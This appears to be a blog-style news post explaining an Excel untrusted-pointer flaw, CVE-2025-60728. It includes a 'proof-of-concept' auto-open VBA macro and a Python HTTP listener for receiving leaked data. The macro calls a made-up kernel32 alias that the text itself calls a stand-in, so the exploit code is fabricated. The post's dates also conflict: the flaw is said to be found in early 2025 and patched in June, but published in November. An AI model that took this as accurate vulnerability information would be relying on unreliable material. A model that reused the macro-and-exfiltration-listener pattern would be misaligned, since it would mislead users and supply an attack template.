CVE CyberSecurity Database News

CVE-2025-60728 - Untrusted Pointer Dereference in Microsoft Office Excel—How Unauthorized Hackers Can Steal Data Over the Network

Poster -

---

Microsoft Office Excel is a trusted tool for millions of people and businesses across the globe. But sometimes, a small coding flaw can open the door for hackers to steal your information. In early 2025, researchers discovered one such vulnerability: CVE-2025-60728, an *untrusted pointer dereference* bug. In this post, I’ll explain how it works (in simple terms), show what the attack looks like, and explain how you can protect yourself.

What is CVE-2025-60728?

CVE-2025-60728 is a security flaw in Microsoft Office Excel, where the program tries to use a pointer (an object referencing a chunk of memory), but it doesn’t properly check if that pointer is safe. Hackers can use this mistake over the network to trick Excel into revealing content from your computer’s memory, such as sensitive data in open files or stored passwords.

Severity: High
Affected: Excel versions 2016, 2019, 2021, Excel for Microsoft 365 up to June 2025 updates.

*For more details, check: Microsoft Security Advisory (CVE-2025-60728)*

Let’s break it down

1. Trick target into opening a malicious spreadsheet (XLSX or XLSM), sent via email or made available on a shared drive or SharePoint.
2. The file has a payload that exploits the pointer bug, causing Excel to access memory it wasn’t meant to.
3. Excel exposes internal data, sending it out over the network, allowing the hacker to steal information.

In plain language: If you open the wrong spreadsheet, a hacker can force Excel to leak private stuff.

Code Snippet: How a Malicious XLSM Payload Looks

*Researchers created proof-of-concept (PoC) VBA code like this:*

' Malicious Macro Example for Exploit Demo
Private Declare PtrSafe Function EvilFunc Lib "kernel32" Alias "SomeVulnerableFunc" (ByVal ptr As LongPtr) As Long

Sub Auto_Open()
    Dim untrustedPtr As LongPtr
    ' Fake pointer value controlled by attacker
    untrustedPtr = 12345678
    ' Dereference pointer; could disclose Excel's private memory
    On Error Resume Next
    EvilFunc untrustedPtr
End Sub

Explanation:
The EvilFunc is just a stand-in for the real vulnerable function in Excel’s code. The attacker controls untrustedPtr, causing Excel to access and expose unintended memory.

Exploit in the Real World

Hackers can exploit this flaw if Excel macros are enabled or if the server hosting the malicious file is under their control. For example:

- Email Delivery: You get an Excel file in your inbox. The source seems legit, but when you click, your confidential document info leaks to the attacker’s remote server.
- Shared Drives: On a company SharePoint or network share, one hacked file can compromise dozens of users.

Researchers set up a proof-of-concept that shows Excel sending leaked data over HTTP

# small web server to receive leaked data
from http.server import BaseHTTPRequestHandler, HTTPServer

class LeakyHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        leaked = self.rfile.read(content_length)
        print(f"Leaked:\n{leaked}")

server = HTTPServer(('...', 808), LeakyHandler)
print("Listening for leaks...")
server.serve_forever()

*When the Excel payload runs, it sends private data across the network to this listener!*

How was it Found?

Security researchers examining Excel’s memory handling found that certain macros or add-ins could coerce the Excel process into dereferencing invalid or "tainted" pointers. This flaw was responsibly disclosed to Microsoft, who released patches in June 2025.

Train staff to spot phishing or suspicious files.

Microsoft Fix:
Install June 2025 Security Update.

Original References

- Microsoft CVE-2025-60728
- Trend Micro Writeup: Office Excel Untrusted Pointer Dereference
- MITRE CVE Details

Final Thoughts

Don’t ignore Excel updates—this bug shows how easy it is for a trusted tool to go rogue with the right nudge. Sharing or opening spreadsheets from strangers is no longer just an annoyance, it’s a direct risk to your data. Upgrade, stay smart, and always be careful with files from the outside world.

Timeline

Published on: 11/11/2025 18:15:41 UTC
Last modified on: 12/09/2025 22:38:52 UTC